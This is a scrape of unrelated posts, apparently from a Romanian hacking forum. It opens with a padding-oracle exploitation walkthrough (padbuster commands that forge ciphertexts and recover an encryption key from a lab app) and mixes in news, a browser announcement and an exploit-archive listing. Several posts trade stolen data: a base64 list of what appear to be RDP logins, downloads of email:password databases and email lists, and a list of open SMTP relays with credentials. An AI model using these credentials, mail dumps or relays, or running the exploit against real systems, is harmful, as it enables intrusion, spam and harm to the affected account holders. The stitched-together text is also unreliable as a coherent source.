# padbuster "http://127.0.0.1:5000/check?cipher=484b850123a04baf15df9be14e87369b" "484b850123a04baf15df9be14e87369b" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e" -plaintext "=bla&ApplicationUsername=admin&Password=admin"

[snip]

[+] Encrypted value is: 753e2047e19bf24866ae5634f3454ef3a3802d5144a051a7246762f57a16f73531d76ada52422e176ea07e45384df69d00000000000000000000000000000000

-------------------------------------------------------

# curl http://127.0.0.1:5000/check?cipher=753e2047e19bf24866ae5634f3454ef3a3802d5144a051a7246762f57a16f73531d76ada52422e176ea07e45384df69d00000000000000000000000000000000

decrypted: ??_c?I?B?C???=bla&ApplicationUsername=admin&Password=admin

parsed: {'\xf7\xc1_c\x9e\x1cI\x9aB\xccC\x10\xac\x07\x90\x97': ['bla'], 'Password': ['admin'], 'ApplicationUsername': ['admin']}

Obtaining the key

Being able to decrypt and craft the ‘cipher’ parameter would be bad enough, but setting the IV to the encryption key introduces another vulnerability: The IV (and therefore the encryption key) is the plain text of the first block XORed with the intermediate value from decrypting the first block (see block diagram below).

We can assume that an attacker could guess the plain text based on the specification, and the decrypted part from the padding oracle attack or messages displayed by the application.

Using padbuster’s -noiv switch we are able to get the intermediate value after decrypting the first block:

# padbuster "http://127.0.0.1:5000/check?cipher=484b850123a04baf15df9be14e87369b" "484b850123a04baf15df9be14e87369b" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e" -noiv               

[snip]

Block 1 Results:

[+] Cipher Text (HEX): 484b850123a04baf15df9be14e87369b

[+] Intermediate Bytes (HEX): 7141425f5d56574351562f1730213728

[snip]

Once we have obtained the intermediate value we can XOR it with the plaintext to obtain the encryption key:

0x4170706c69636174696f6e557365726e (plaintext ‘ApplicationUsern’)

XOR

0x7141425f5d56574351562f1730213728 (intermediate value)

=

0x30313233343536373839414243444546 (key ‘0123456789ABCDEF’)

Custom Python script

The python-paddingoracle library allows us to create a custom exploit tool for situations where padbuster is not flexible enough. For example, when the target application uses CSRF tokens or when testing web services.

Two Python scripts that exploit our example web application can be found on GitHub. The first script ‘http-simple.py’ is targeted for the straightforward scenario. Exploiting the more advanced scenario, which requires a prefixed ciphertext has been implemented in ‘http-advanced.py’. This script also demonstrates how to encrypt a plaintext and calculate the key.

A few additional notes

The Bit flipper payload in the Intruder module of the Burp Proxy is great to see how an application handles encrypted values. You should get suspicious if it accepts some tampered payloads or returns different error messages. This would usually happen if there is no MAC.

Encryption without MAC should be considered a finding regardless of any padding oracle. Because of the way CBC works we can always tamper with encrypted values.

Prepending another ciphertext in padbuster can come in handy in other situations as well: The application could have an id within the encrypted fields to detect tampering (similar to a nonce). By prepending a mangled block we can stop the application from recognising the id for the current cipher field.

For the sake of convenience the sample app also has a feature to encrypt arbitrary data:

# curl http://127.0.0.1:5000/encrypt?plain=ApplicationUsername%3Duser%26Password%3Dsesame

crypted: 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6

Appendix: Ciphertext blocks

Block 1:

484b850123a04baf15df9be14e87369b

ApplicationUsern

Block 2:

c59ca16e1f3645ef53cc6a4d9d87308e

ame=user&Passwor

Block 3:

d2382fb0a54f3a2954bfebe0a04dd4d6

d=sesame[padding]

Source: http://blog.gdssecurity.com/labs/2015/10/26/exploiting-padding-oracle-to-gain-encryption-keys.html

[DevOpsDays DC 2015]

DevOpsDays DC 2015 - 30 - DevOops & How I hacked you - Chris Gates, Facebook & Ken Johnson, nVisium

In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.

Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.

https://vimeo.com/137691444

[[eBook] Introduction to Network Security: Theory and Practice, 2nd Edition]

@wildchild

am pus acum si link de download, scuze

https://www.sendspace.com/file/iwp2ys

rstforums.com

[[eBook] Introduction to Network Security: Theory and Practice, 2nd Edition]

Introduction to Network Security: Theory and Practice

Authors: JIE WANG, ZACHARY CHISSEL

Read:

https://www.scribd.com/doc/288343834/Introduction-to-Network-Security-Theory-and-Practice-2nd-Edition

Download:

https://www.sendspace.com/file/iwp2ys

pwd: rstforums.com

[Vivaldi launches its first beta]

Hi everyone,

We are very excited to announce that Vivaldi Beta is released for download today. With the first technical preview launch back in January this year, we set out to develop a web browser that was fast, powerful and customizable, for power users around the world.

After 50 snapshots and 4 Technical previews, Vivaldi has now reached Beta.

We cannot thank you enough for all the support we have gotten from our community. We couldn't have done it without you. Special thanks goes to the Sopranos (our volunteer test team) for always being willing to test our internal builds and give us valuable feedback.

Download Vivaldi Beta from here and spread the word for us. Share this with your friends and co-workers through Twitter and Facebook and get them as excited about this awesome browser as we are.

We will continues to work hard, so expect more features and bug fixes coming before the final release. As always, we love to hear from you. Post your feedback on our forums or below.

For those of you following our previous TPs, here is the feature history overview.

Feature additions since the first technology preview

TP1 (released on 27.01.2015)

• Tab stacking
  
• Notes
  
• Speed Dial
  
• Bookmarks manager
  
• Downloads manager
  
• Quick commands
  
• Mouse gestures
  
• Page actions
  
• Sidebar
  
• Colored tabs
  
• Visual tabs
  
• Recently closed tabs
  
• Shortcuts
  
• 
  

TP2 (released on 05.03.2015)

• Bookmarks bar
  
• On-demand image loading
  
• Fast/Forward
  
• Spatial navigation
  
• TP3 (release on 28.04.2015)
  
• Tab Stack Tiling
  
• Unseen page marker
  
• Native window
  
• Autoupdate
  
• Personal data importing
  
• Plug-ins on demand
  
• Background tabs loading indicator
  

TP4 (release on 16.07.2015)

• Startup options
  
• Color schemes
  
• UI zoom
  
• HiDPI support
  
• Pinned tabs
  
• Task manager
  

Beta 1 (released on 03.11.2015)

• Web-panels
  
• Chromeless UI
  
• Tabs visual navigation
  
• Private window
  
• Page loading progress indicator
  
• Typed history list
  
• Smooth scrolling
  
• Geolocation support
  
• HTML5 h.264 support
  
• Full Extensions support
  

All the best,

The Vivaldi team

Via

[Colectie Hakin9 Magazine (2005-2013)]

in alta parte free, poti sa le urci?

Quote

Error. Captcha expired.

Try again in 1 hour.

Don`t want to wait? Buy Premium right now!

[Let`s do it - Donam si noi?]

pt. cei care nu pot sa doneze

mcspliff wrote:

-------- mcspliff wrote: --------

Salut,

Felicitari pentru initiativa. Daca ai putea incuraja oamenii sa intrebe si daca este nevoie de ei la centrele de donare, ar fi perfect.

Este nevoie si de oameni care sa ajute la carat produsele donate de branduri sau de suplinit asistentele care inregistreaza donatorii.

Ieri am suplinit o asistenta pret de cateva ore la Centrul de Donare Dr. Felix. Doamnele erau la munca de peste 24 de ore si se lesina din cauza epuizarii pe capete.

Numai bine!

sursa filelist

[Cam4.com [ Gold ]]

Malware

[rdp's]

MTIyLjE2OS40Mi4xM0B1c2VyOzEyMzQ1DQoxNDguMjUxLjE1MC4yMDFAQWRtaW5pc3RyYXRvcjthZG1pbg0KODkuMTIxLjIwOC4xODhAcmVtb3RlO3JlbW90ZQ0KMjE2LjI0MC40MC4yNTBAQWRtaW5pc3RyYXRvcjthZG1pbg0KMTU5LjAuMTQwLjUwQHVzZXIxOzEyMzQNCjI0LjEwMC4xMjcuMjI1QHJlbW90ZTtyZW1vdGUNCjgyLjY4LjkyLjZAQWRtaW5pc3RyYXRvcjtQYXNzdzByZA0KMjAxLjg5LjM5LjkwQHVzZXI7MQ0KNTkuOTAuMjA4LjI0OEB1c2VyMTsxMjM0DQo1NC4yNTQuMTU2LjIxNkBBZG1pbmlzdHJhdG9yO3Bhc3N3b3JkDQoxODkuMjQ0LjEwNS42NEB1c2VyMTt1c2VyMQ0KMjA5LjIzNS4xNjcuNjhAdXNlcjt1c2VyMQ0KODEuMjMuMi4xOTRAdGVzdDt0ZXN0DQoyMTguMTQuMTcyLjE0QEFkbWluaXN0cmF0b3I7MQ0KMTkwLjEwNS4yMi44NkBhZG1pbjthZG1pbg0KODkuMjU1LjEyOC4xNDhAdGVzdDtwYXNzd29yZA0KNTIuMjEuMTAxLjQ5QEFkbWluaXN0cmF0b3I7UEBzc3cwcmQNCjIxMy4yMzAuMTA4LjQ0QGFkbWluOzEyMw0KODIuMjM5LjEyOS44M0BhZG1pbjthZG1pbg0KMTIzLjYzLjM2Ljc1QHRlc3Q7dGVzdA0KMTEzLjIwNy4zNy40MUBBZG1pbmlzdHJhdG9yO1BAc3N3MHJkDQoxODkuMjU0LjgyLjhAQWRtaW5pc3RyYXRvcjtQYXNzdzByZA0KMTE3LjE1OC44Ni4xMTVAQWRtaW5pc3RyYXRvcjsxDQoxMjIuMTY5LjQyLjEzQHVzZXI7MTIzNDUNCjcyLjc2LjE3NS4yMzRAdXNlcjE7dXNlcjENCjE3NS4yMDIuNjQuODNAdXNlcjE7MXEydzNlNHINCjQ2LjQwLjIzNi4xMzRAQWRtaW5pc3RyYXRvcjtQQHNzdzByZA0KODcuMTE3LjQwLjExN0B1c2VyOzENCjIxNy44OC40MC4xODZAc3lzO3N5cw0KNTguMjE4LjIwNC4yNTRAbWFuYWdlcjtzZXJ2ZXINCjc3LjkyLjI1MS4xMzRAQWRtaW5pc3RyYXRvcjsxMjMgIGUgbWlyIEFJcnBvcnQNCjE4Mi4xOTEuNzAuMzFAdXNlcjt1c2VyDQoxNC45Ny4yNDEuMTUzQHVzZXI7cGFzcw0KMTEyLjEzMy4xOTYuMTM5QHVzZXIxOzEyMw0KNjIuMjE2LjM1Ljc0QHVzZXI7MTIzNA0KMTE3LjIxOC4xNy4zOUB1c2VyMTsxDQoyMDEuMjM5LjE1LjI1MEB0ZXN0OzENCjgyLjE5OC4xMTIuMjdAbWFuYWdlcjttYW5hZ2VyDQo5MS4xMTcuMTU2LjEwN0BBZG1pbmlzdHJhZG9yOzEyMzQNCjExNi42LjkzLjEyMkB0ZXN0O3Rlc3QNCjE0LjE0OC4xMjUuMjIzQEFkbWluMTsxMjMNCjExNC4xOTkuMTcuNjFAdGVzdDsxMjM0DQoyMDEuMTkuMTI5LjI2QEFkbWluaXN0cmFkb3I7MTIzDQoyNy41MC4yMi45NEB1c2VyMTt1c2VyDQoyMDEuODUuODIuMzRAdXNlcjt1c2VyDQoxOTIuMTE4LjEwMC4zQHRlc3Q7MXEydzNlNHINCjE4My44Ny41Ny4yNkB1c2VyMTsxMjMNCjE4OS42MC40OS4xMDBAdXNlcjE7MTIzDQoyLjkwLjUxLjE5NEB0ZXN0O3Bhc3N3b3JkDQoxOTcuODEuMjEzLjU0QHRlc3Q7dGVzdA0KMjE4LjkzLjI1Mi44OUB1c2VyMTtzeXN0ZW0NCjE4Mi43My4yMS40NEB0ZXN0O3Rlc3QNCjE3NS4xMDAuMTgzLjI0OUB1c2VyMTt1c2VyMQ==

64

[[help] allview phone google store]

Salut, are fratele meu mai mic telefon allview pe android si nu reuseste sa instaleze jocuri de pe google store,

versiune App Google 4.9.22.16.arm

versiune google play 5.7.10

cand incearca sa instaleze ii afiseaza bara cu loading..., dar nu se deschide aplicatia si nici nu confirma ca a fost instalata cu succes, pur si simplu ramane in stadiul de loading,

am incercat cu setting->application->manage->all tab->google play store-> clear data

nimic, am restartat telefonul, am scos cartela, nimic...

stie cineva o rezolvare?

multumesc anticipat

[vand mail-uri orice tara]

update, Romania 1 mil si ceva... + metoda

[Facebook to Launch Its Own Satellite to Beam Free Internet]

Do you hear the same as me? Is Facebook planning to Launch Satellite?

Yes, it's True. Facebook has revealed its secret plan to launch a $500 Million Satellite by 2016 in order to provide Free or cheap Internet access in the developing nations.

Facebook CEO Mark Zuckerberg made an announcement that the social network partnered with French satellite provider Eutelsat Communications to beam free Internet to several countries in Sub-Saharan Africa.

Internet-by-Satellite

The plan is part of Facebook's Internet.org project that has been criticized for net neutrality issues in some countries, particularly India, where businesses believes that the plans could give Facebook and its partners unfair benefits in developing Internet markets.

Facebook has been exploring ways to provide the Internet to hard-to-reach places and this latest initiative to use Satellite technology for providing affordable Internet is part of the Facebook initiative to connect the world.

"Over the last year Facebook has been exploring [new] ways to use aircraft and satellites to beam Internet access down into communities from the sky," Zuckerberg said in a post. "To connect people living in remote regions, traditional connectivity infrastructure is often difficult and inefficient."

AMOS-6 Satellite to Launch by 2016

Facebook and Eutelsat will work with Spacecom to utilize its entire broadband payload on the AMOS-6 (geostationary) satellite, which is expected to launch in 2016.

Along with gateways and terminals on the ground, AMOS-6 will provide high gain spot beams of data that will cover large parts of West, East and Southern Africa.

Interestingly, the AMOS-6 satellite is to be lofted into the sky using Elon Musk SpaceX's Falcon 9 rocket.

Facebook is Looking Beyond the Planet

"This is just one of the innovations we're working on to achieve our mission with Internet.org," Zuckerberg said. "We're going to keep working to connect the entire world — even if that means looking beyond our planet."

Several companies already provide Internet access through satellite, but it is likely a costly option out of the reach of most people in the developing countries.

Internet-by-satellite is not, of course, Facebook's only plan of action for providing cheap Internet to remote areas. The social network giant is also working on giant drones for offering the Internet, but that technology has just begun being tested in the real world.

Via

[Global nuclear facilities 'at risk' of cyber attack]

Iran's nuclear enrichment systems were hit by the Stuxnet virus that targeted centrifuges

The risk of a "serious cyber attack" on nuclear power plants around the world is growing, warns a report.

The civil nuclear infrastructure in most nations is not well prepared to defend against such attacks, it added.

Many of the control systems for the infrastructure were "insecure by design" because of their age, it said.

Published by the influential Chatham House think tank, the report studied cyber defences in power plants around the world over an 18-month period.

Core breach

Cyber criminals, state-sponsored hackers and terrorists were all increasing their online activity, it said, meaning that the risk of a significant net-based attack was "ever present".

Such an attack on a nuclear plant, even if small-scale or unlikely, needed to be taken seriously because of the harm that would follow if radiation were released.

In addition, it said "even a small-scale cyber security incident at a nuclear facility would be likely to have a disproportionate effect on public opinion and the future of the civil nuclear industry".

Unfortunately, research carried out for the study showed that the UK's nuclear plants and associated infrastructure were not well protected or prepared because the industry had converted to digital systems relatively recently.

This increasing digitisation and growing reliance on commercial software is only increasing the risks the nuclear industry faces.

There was a "pervading myth" that computer systems in power plants were isolated from the internet at large and because of this were immune to the kind of cyber attacks that have dogged other industries.

However, it said, this so-called "air gap" between the public internet and nuclear systems was easy to breach with "nothing more than a flash drive". It noted that the destructive Stuxnet computer virus infected Iran's nuclear facilities via this route.

The story of Stuxnet

• In 2009, a malicious computer program called 'Stuxnet' was manually uploaded into a nuclear plant in Iran.
  
• The worm took control of 1,000 machines involved with producing nuclear materials, and instructed them to self-destruct.
  

What made the world's first cyber-weapon so destructive?

The researchers for the report had also found evidence of virtual networks and other links to the public internet on nuclear infrastructure networks. Some of these were forgotten or simply unknown to those in charge of these organisations.

Already search engines that sought out critical infrastructure had indexed these links making it easy for attackers to find ways in to networks and control systems.

Keith Parker, chief executive of the Nuclear Industry Association, said: "Security, including cyber security, is an absolute priority for power station operators."

"All of Britain's power stations are designed with safety in mind and are stress-tested to withstand a vast range of potential incidents," he added. "Power station operators work closely with national agencies such as the Centre for the Protection of National Infrastructure and other intelligence agencies to always be aware of emerging threats."

In addition, said Mr Parker, the industry's regulator continuously monitors plant safety to help protect it from any outside threats.

In June this year the International Atomic Energy Agency held its first international conference about the cyber threats facing plants and manufacturing facilities. At the conference Yukiya Amano, director of the IAEA, said both random and targeted attacks were being directed at nuclear plants.

"Staff responsible for nuclear security should know how to repel cyber-attacks and to limit the damage if systems are actually penetrated," he said in a keynote address to the conference.

The civil nuclear industry should do a better job of measuring cyber attack risks and improve the way it defends against them, according to Chatham House. Many plants examined by the report's researchers lacked preparedness for large-scale attacks that took place outside office hours.

"The nuclear industry is beginning - but struggling - to come to grips with this new, insidious threat," said Patricia Lewis, research director of Chatham House's international security programme.

Via

[Distro Checker 1.0.1]

Distro Checker is a tool written for doing cross distribution exploit testing.

More information

Downlaod

https://packetstormsecurity.com/files/133871/Distro-Checker-1.0.1.html

[databases email:pwd Russia]

https://www.sendspace.com/file/g2nwkl

pwd:

rstforums.com

[Packet Storm New Exploits For September, 2015]

This archive contains 191 exploits that were added to Packet Storm in September, 2015.

Content:

09/26/2015  02:01 AM             2,574 4images1711-xss.txt
09/21/2015  05:22 AM             4,520 adhweb-bypass.txt
09/07/2015  05:33 PM             5,512 advantechwebaccess-exec.txt
09/16/2015  06:22 PM             4,550 anchorcms092-xssredirect.txt
09/10/2015  03:14 AM            15,023 androidstagefright-exec.txt
09/14/2015  04:33 PM             3,146 AS-CP_IKEVIEW-0911.txt
09/25/2015  10:00 AM             3,466 AS-FORTIMANAGER-XSS-0924.txt
09/26/2015  05:44 PM             3,874 AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt
09/15/2015  01:22 AM             3,370 AS-IKEVIEWR60-0914.txt.txt
09/06/2015  10:32 PM             2,928 AS-JSPMYSQLADMINISTRADOR-0904.txt
09/14/2015  05:44 PM             2,903 AS-MONSTAFTP-0911.txt
09/15/2015  01:22 AM             3,095 AS-OPENFIRE-CSRF.txt
09/15/2015  09:05 AM             2,190 AS-OPENFIRE-FILE-UPLOAD.txt
09/15/2015  09:03 AM             2,164 AS-OPENFIRE-PRIV-ESCALATION.txt
09/15/2015  09:04 AM             2,701 AS-OPENFIRE-RFI.txt
09/15/2015  09:01 AM             3,116 AS-OPENFIRE-XSS.txt
09/07/2015  05:05 PM             4,129 autocad-overflow.txt
09/09/2015  05:17 AM             1,892 autoexchanger-xsrf.txt
09/28/2015  11:48 PM               781 bisonftp_dir_trav.py.txt
09/15/2015  08:00 AM             5,634 bolt_file_upload.rb.txt
09/04/2015  03:55 AM             4,474 bypassuac_vbs.rb.txt
09/02/2015  06:50 PM             4,338 cerb-xsrf.txt
09/23/2015  06:22 AM             6,198 ciscoanyconnect-escalate.tgz
09/24/2015  04:45 AM           169,399 ciscoanyconnectdmg-escalate.txt
09/28/2015  11:15 PM             1,128 collabtive20-shell.txt
09/12/2015  03:12 PM             2,104 cubecart-bypass.txt
09/26/2015  02:02 AM             2,626 CVE-2015-7323.txt
09/09/2015  03:33 AM             5,223 directadmin-xssxsrf.txt
09/08/2015  07:44 AM               791 disconnectme-escalate.txt
09/17/2015  02:47 AM           584,490 dotnet-mvc-redos-cve2015-2526-ms15-101-malerisch.pdf
09/02/2015  05:44 PM             4,076 edimaxbr-xssxsrfsplit.txt
09/07/2015  07:26 PM             5,890 efw_chpasswd_exec.rb.txt
09/10/2015  03:11 AM             6,537 ERPSCAN-15-014.txt
09/10/2015  03:00 AM             6,302 ERPSCAN-15-015.txt
09/10/2015  03:00 AM             6,527 ERPSCAN-15-016.txt
09/18/2015  05:44 PM             1,437 farol-sql.txt
09/07/2015  07:23 PM             1,989 fireeye-disclose.txt
09/07/2015  11:22 PM             2,426 gmpunserialize-uaf.txt
09/03/2015  06:55 PM             1,265 gpon-xsrf.txt
09/14/2015  06:55 PM             4,469 GS20150915052102.tgz
09/14/2015  05:44 PM             3,505 GS20150915052344.tgz
09/14/2015  11:02 PM             3,821 GS20150915052600.tgz
09/18/2015  01:11 PM             1,938 GS20150919145459.tgz
09/18/2015  12:22 PM         4,175,584 GS20150919145515.tgz
09/18/2015  02:33 PM            70,978 GS20150919145732.tgz
09/18/2015  03:12 PM            63,903 GS20150919145908.tgz
09/19/2015  01:22 AM             1,266 GS20150919150006.tgz
09/18/2015  11:22 PM            65,726 GS20150919150144.tgz
09/18/2015  08:22 PM            43,648 GS20150919150228.tgz
09/18/2015  06:55 PM         1,182,387 GS20150919150336.tgz
09/18/2015  06:55 PM           453,053 GS20150919150449.tgz
09/18/2015  07:22 PM            65,705 GS20150919150941.tgz
09/18/2015  11:22 PM            56,317 GS20150919151127.tgz
09/22/2015  05:02 PM             3,231 GS20150923050903.tgz
09/22/2015  06:55 PM             4,776 GS20150923051101.tgz
09/22/2015  06:55 PM             2,786 GS20150923051223.tgz
09/22/2015  07:22 PM             6,975 GS20150923051317.tgz
09/22/2015  06:02 PM           102,558 GS20150923051455.tgz
09/22/2015  06:02 PM           235,539 GS20150923051616.tgz
09/22/2015  02:11 PM             4,835 GS20150923051755.tgz
09/22/2015  05:04 PM             4,356 GS20150923051911.tgz
09/22/2015  09:22 PM             6,063 GS20150923052025.tgz
09/22/2015  07:20 PM             3,937 GS20150923052141.tgz
09/22/2015  10:22 PM             4,670 GS20150923052244.tgz
09/22/2015  01:44 PM             3,670 GS20150923052359.tgz
09/23/2015  06:33 AM             5,563 GS20150923052556.tgz
09/23/2015  03:02 AM             4,583 GS20150923052733.tgz
09/23/2015  06:02 AM               903 GS20150923053511.tgz
09/22/2015  04:11 AM             1,135 GS20150923053636.tgz
09/23/2015  03:33 AM             3,724 GS20150923053958.tgz
09/23/2015  03:05 AM             4,039 GS20150923054638.tgz
09/23/2015  07:22 PM             3,735 GS20150923054846.tgz
09/23/2015  06:51 PM             3,453 GS20150923155121.tgz
09/24/2015  03:00 AM             3,699 GS20150924014637.tgz
09/28/2015  11:44 PM            53,509 GS20150928204418.tgz
09/28/2015  11:51 PM             5,344 GS20150928205154.tgz
09/07/2015  06:55 PM             3,233 hootoo-xsrf.txt
09/09/2015  02:33 AM               558 ibmaixhacmp-escalate.txt
09/18/2015  01:11 PM             4,765 ibookingcms-sql.txt
09/21/2015  03:51 AM             1,640 intelbraswrn-dnschange.txt
09/23/2015  06:59 PM             3,439 itop-xss.txt
09/21/2015  05:44 PM             1,354 jasigcas401-xss.txt
09/27/2015  10:22 PM            40,757 jsproxy_crypto-master.zip
09/30/2015  07:13 AM             5,392 kaseyavsa-execescalate.txt
09/16/2015  09:32 PM             6,144 kirbycms21-bypasstraversal.txt
09/16/2015  06:55 PM             6,697 kirbycms210-xsrfexec.txt
09/14/2015  04:02 PM             2,667 KIS-2015-04.txt
09/19/2015  06:40 PM            10,593 KL-001-2015-005.txt
09/19/2015  06:45 PM             2,152 kmftp_utility_cwd.rb.txt
09/16/2015  05:44 PM             3,510 manageengine-sql.txt
09/16/2015  04:33 PM             3,272 manageengineopmanager-default.txt
09/28/2015  11:46 PM             7,212 manageengine_eventlog_analyzer_rce.rb.txt
09/17/2015  08:06 AM             5,889 manage_engine_opmanager_rce.rb.txt
09/04/2015  03:02 AM               820 milw0rm-xss.txt
09/30/2015  07:08 AM             3,443 mitsubishimelsec-dos.txt
09/17/2015  08:03 AM            16,834 ms15_078_atmfd_bof.rb.txt
09/15/2015  08:01 AM             1,924 ms15_100_mcl_exe.rb.txt
09/26/2015  03:02 AM             8,286 MZ-15-03-GOOD-Auth-Delegation.txt
09/07/2015  07:20 PM             3,483 netgearwms-bypassescalate.txt
09/01/2015  06:55 PM             2,972 nibbleblog403-exec.txt
09/01/2015  03:22 PM             1,614 nibbleblog403-xsrf.txt
09/13/2015  06:33 AM             1,929 nokiasolutions-xss.txt
09/10/2015  10:32 PM             2,313 NS-15-014.txt
09/04/2015  03:22 AM             1,185 opendocman132-xss.txt
09/14/2015  02:11 PM             5,804 openldap-dos.txt
09/29/2015  04:11 AM               753 pcman_dir_traversal.py.txt
09/18/2015  01:11 PM             2,958 pentaho-disclose.txt
09/07/2015  07:55 AM             2,162 poc_pointer_dynamic_vul.c
09/28/2015  11:35 PM               774 Projeqtor_FileUpload.txt
09/09/2015  05:18 AM             3,407 qlikview-xxe.txt
09/10/2015  05:44 PM             1,029 raritanpoweriq-default.txt
09/04/2015  03:57 AM             6,878 registry_persistence.rb.txt
09/21/2015  03:11 PM             1,221 sapnetweaver-xxe.txt
09/01/2015  06:40 PM             6,480 serendipity201-shell.txt
09/01/2015  10:32 PM             3,457 serendipity201-sql.txt
09/01/2015  11:02 PM             2,397 serendipity201-xss.txt
09/07/2015  09:22 PM             2,838 sessiondeserializer-uaf.txt
09/22/2015  01:11 PM             6,076 shadowinfosystem-disclose.txt
09/14/2015  01:22 PM             8,712 silverpeak-exec.txt
09/25/2015  02:55 AM             6,935 smf_rme_exploit.py.txt
09/02/2015  08:55 AM               542 sphereftp2-poc.txt
09/08/2015  01:22 AM             2,240 spldoublylinkedlist-uat.txt
09/07/2015  06:55 PM             2,415 splobjectstorageun-uaf.txt
09/10/2015  03:09 AM             6,116 synologyds-xss.tgz
09/10/2015  03:05 AM             5,592 synologyvs-execsql.txt
09/04/2015  03:32 AM                 0 SYSS-2015-016.txt
09/26/2015  05:22 PM             2,440 telegram-dos.txt
09/20/2015  04:33 PM             2,552 thomsondwg849-disclose.txt
09/02/2015  04:33 PM             3,897 thomsonwireless-bypass.txt
09/20/2015  09:11 PM             2,741 totalcommander852-overflow.txt
09/20/2015  09:22 PM             2,431 totalcommander852win-overflow.txt
09/14/2015  10:22 PM             4,787 typo3cms-xss.txt
09/26/2015  04:33 PM           105,313 ubuntu-escalate.tgz
09/24/2015  11:02 PM             1,602 unifiedlayer-upload.txt
09/07/2015  05:02 PM             3,740 unserialize-uaf.txt
09/08/2015  06:55 PM             3,222 verypdfconverter-overflow.txt
09/04/2015  03:01 AM               735 virtualfreer-bypass.txt
09/13/2015  02:11 PM             8,144 VL-1552.txt
09/24/2015  04:30 AM            13,131 VL-1560.txt
09/14/2015  03:00 AM            13,344 VL-1570.txt
09/24/2015  08:22 PM            11,098 VL-1572.txt
09/28/2015  01:11 PM            25,114 VL-1574.txt
09/28/2015  05:44 PM             9,270 VL-1589.txt
09/22/2015  04:44 PM             6,820 VL-1590.txt
09/04/2015  03:34 AM             6,542 VL-1591.txt
09/14/2015  04:11 AM             9,995 VL-1593.txt
09/24/2015  04:31 AM             9,711 VL-1595.txt
09/22/2015  09:22 PM             9,291 VL-1597.txt
09/12/2015  01:22 AM             9,255 VL-1598.txt
09/29/2015  01:01 AM             8,780 VL-1600.txt
09/24/2015  04:33 AM             8,675 VL-1601.txt
09/28/2015  12:11 PM             6,660 VL-1607.txt
09/29/2015  01:02 AM             7,807 VL-1609.txt
09/29/2015  04:09 AM             5,949 vtiger-crm-authenticated-rce-cve-2015-6000.txt
09/26/2015  03:00 AM             4,681 vufind-xss.txt
09/23/2015  06:57 PM             4,039 w3tw0rk_exec.rb.txt
09/26/2015  06:12 AM             8,784 watchguard_cmd_exec.rb.txt
09/26/2015  06:10 AM             3,205 watchguard_fix_corrupt_mail.rb.txt
09/01/2015  06:55 PM             2,010 watupro-xsrf.txt
09/01/2015  05:44 PM             2,528 watupro-xss.txt
09/01/2015  08:22 PM             2,060 watuproplay-xss.txt
09/30/2015  06:57 AM             8,131 westerndigitalmycloud-exec.txt
09/28/2015  11:37 PM             1,120 wpabc-xss.txt
09/16/2015  01:11 PM             1,561 wpaloen-xsrfxss.txt
09/05/2015  04:33 PM             4,044 wpcfg-xsrf.tgz
09/08/2015  04:33 PM             1,291 wpeasymediagallery-xss.txt
09/07/2015  08:22 PM             1,152 wpeshop-xss.txt
09/30/2015  03:00 AM             3,161 wpmthemeunus-lfi.txt
09/16/2015  04:33 PM             1,676 wpshop-xss.txt
09/19/2015  03:22 AM             1,956 wpverticalimageslider-xsrfxss.txt
09/16/2015  02:11 PM             2,592 wpxpinnerlite-xsrfxss.txt
09/26/2015  06:00 AM             3,117 x2engine-upload.txt
09/26/2015  05:57 AM             4,751 x2engine-xss.txt
09/26/2015  06:02 AM             5,003 x2engine42-xsrf.txt
09/16/2015  10:22 PM             5,449 zencart154-execleak.txt
09/16/2015  08:32 PM             2,671 zeuscart4-exec.txt
09/16/2015  04:33 PM             6,714 zeuscart4-sql.txt
09/16/2015  06:02 PM             1,348 zeuscart4-xsrf.txt
09/16/2015  04:03 PM             1,528 zeuscart4-xss.txt
09/15/2015  02:44 AM             1,754 ZSL-2015-5255.txt
09/27/2015  05:11 PM             2,609 ZSL-2015-5256.txt
09/27/2015  06:55 PM             1,729 ZSL-2015-5257.txt
09/28/2015  08:40 PM             3,229 ZSL-2015-5258.txt
09/28/2015  08:46 PM             4,066 ZSL-2015-5259.txt
09/28/2015  11:10 PM             3,459 ZSL-2015-5260.txt
09/28/2015  11:13 PM             4,026 ZSL-2015-5262.txt
09/28/2015  11:53 PM             3,245 ZSL-2015-5263.txt
09/28/2015  11:39 PM             3,886 ZSL-2015-5264.txt
09/29/2015  01:03 AM             2,044 ZSL-2015-5265.txt
09/29/2015  04:14 AM             2,547 ZSL-2015-5266.txt
09/28/2015  11:11 PM             2,236 ZSL-2015-5621.txt
             191 File(s)      8,215,482 bytes

Download

https://packetstormsecurity.com/files/133814/Packet-Storm-New-Exploits-For-September-2015.html

[20k emails]

20k mails

https://www.sendspace.com/file/06qlj8

pwd:

rstforums.com

[free VPS]

free virtual private servers with 2 Cores, 4G RAM, 10G SSD

Register:

https://www.labxnow.org/

[free SMTPs]

185.22.185.129:25 | postmaster : password |  SSL: False | Hostname: ns1.gulluoglu.com
213.74.125.34:465 | no auth |  SSL: True | Hostname: host-213-74-125-34.superonline.net
216.122.7.204:25 | no auth |  SSL: False | Hostname: m2.blogsites.club
216.122.6.88:25 | no auth |  SSL: False | Hostname: .
216.122.6.86:25 | no auth |  SSL: False | Hostname: .
216.122.6.85:25 | no auth |  SSL: False | Hostname: r85-6-dsl.sea.lightrealm.net
216.122.6.89:25 | no auth |  SSL: False | Hostname: .
216.122.7.203:25 | no auth |  SSL: False | Hostname: m1.blogsites.club
216.122.6.84:25 | no auth |  SSL: False | Hostname: r84-6-dsl.sea.lightrealm.net
216.122.6.87:25 | no auth |  SSL: False | Hostname: r87-6-dsl.sea.lightrealm.net
216.122.7.205:25 | no auth |  SSL: False | Hostname: .
216.122.7.206:25 | no auth |  SSL: False | Hostname: .
216.25.57.20:25 | no auth |  SSL: False | Hostname: return.applifyer.net
